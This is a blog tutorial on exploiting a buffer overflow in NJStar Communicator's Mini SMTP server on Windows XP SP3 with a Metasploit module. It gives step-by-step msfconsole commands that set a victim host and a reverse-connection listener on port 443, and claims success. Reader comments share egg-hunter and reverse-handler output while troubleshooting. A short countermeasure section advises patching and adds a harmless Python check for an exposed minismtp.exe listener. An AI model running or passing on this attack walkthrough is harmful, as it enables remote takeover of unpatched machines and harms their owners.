Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5R1

Victim O.S : Windows XP SP3

Exploit Credit : Dillon Beresford

When I saw this exploit 2 weeks ago, I wondered why I had never heard of this software before. Inside China itself, the most popular software for writing Chinese characters was Sogou. Maybe it's because NJStar has an English version, so it is probably more popular with users outside China who are just starting to learn Chinese Hanzi characters 🙂

This software also has a mini SMTP server for sending e-mail, so with just one click you can send an e-mail to any destination you want.

So how does the exploit work?

According to metasploit.com, this exploit targets minismtp.exe because it is the only NJStar component in memory, and its base starts with a 0x00.

Requirements :

1. NJStar 300 Communicator Mini SMTP Server application (download link: Mediafire.com)

2. NJStar SMTP Exploit (Mediafire.com)

Step by Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.94

1. Download the required files above (the application and the exploit).

– Install the vulnerable application on your Windows XP SP3 machine.

– Copy the NJStar SMTP exploit to your attacker machine and put it in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI: this location depends on where you installed the Metasploit Framework, especially for Windows users)

2. Open your terminal (CTRL+ALT+T) and start the Metasploit console by typing msfconsole, then use the exploit we've just added, and do not forget to set the payload as well.


3. You can view the available options by typing the show options command in msfconsole. Below is the configuration I used to make the exploit work.


Information :

msf  exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP Address
rhost => 192.168.8.94
msf  exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set attacker IP Address to handle connection when exploit success
lhost => 192.168.8.93
msf  exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle connection
lport => 443
msf  exploit(njstar_smtp_bof) > set target 0 --> set the target to windows xp sp2/sp3
target => 0

4. When everything has been set up, let's see whether the exploit works by running the exploit command from msfconsole.


Pwn3D!!

Countermeasures :

1. Update your NJStar Communicator to the latest version.
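
To find machines that still need this update, the check below cross-references `netstat -ano` and `tasklist /fo csv /nh` output and flags a minismtp.exe process listening on a non-loopback address. This is an added example, not part of the original post; the sample command output (including port 25 and the PIDs) is constructed.

```python
import csv
import io

# Constructed sample output (not captured from a real host).
NETSTAT_ANO = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING       1812
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING       1440
  TCP    192.168.8.94:139       0.0.0.0:0              LISTENING       4
"""
TASKLIST_CSV = """\
"System","4","Console","0","236 K"
"svchost.exe","932","Console","0","4,120 K"
"alg.exe","1440","Console","0","3,512 K"
"minismtp.exe","1812","Console","0","5,904 K"
"""

def pid_to_image(tasklist_csv):
    """Map PID -> lower-cased image name from `tasklist /fo csv /nh` output."""
    rows = csv.reader(io.StringIO(tasklist_csv))
    return {int(r[1]): r[0].lower() for r in rows if len(r) >= 2 and r[1].isdigit()}

def listeners(netstat_ano):
    """Yield (address, port, pid) for each TCP LISTENING row of `netstat -ano`."""
    for line in netstat_ano.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING" and f[4].isdigit():
            addr, _, port = f[1].rpartition(":")
            if port.isdigit():
                yield addr, int(port), int(f[4])

def exposed_minismtp(netstat_ano, tasklist_csv, image="minismtp.exe"):
    """Return listeners owned by `image` that are reachable from the network."""
    images = pid_to_image(tasklist_csv)
    return [
        {"address": a, "port": p, "pid": pid}
        for a, p, pid in listeners(netstat_ano)
        if images.get(pid) == image and not a.startswith("127.")
    ]

if __name__ == "__main__":
    for hit in exposed_minismtp(NETSTAT_ANO, TASKLIST_CSV):
        print("minismtp.exe listening on %(address)s:%(port)d (PID %(pid)d)" % hit)
```
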

Hope it's useful 🙂

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

  • toooottooo

    [*] Started reverse handler on 192.168.1.2:4444
    [*] Trying target Windows XP SP2/SP3…
    [*] Sending the egg…
    [*] Sending our buffer containing the egg hunter…
    It doesn't work, please help me ;(

    • v4L

      #toooottooo
      What about the target OS you use? This exploit only works for Windows XP SP2 or XP SP3.
      And what about the firewall installed on the target machine? Maybe the firewall blocked it.

  • chrisk_44

    msf exploit(njstar_smtp_bof) > exploit
    [*] Started reverse handler on 192.168.0.99:443
    [*] Trying target Windows XP SP2/SP3…
    [*] Sending the egg…
    [*] Sending our buffer containing the egg hunter…
    msf exploit(njstar_smtp_bof) >

    It stops there. I’m trying to attack a Windows XP SP3 system. The firewall on the Windows system and on my system is turned off. I also disabled the antivirus firewall (ESET NOD32 Smart Security Personal Firewall) on the remote computer. What should I do?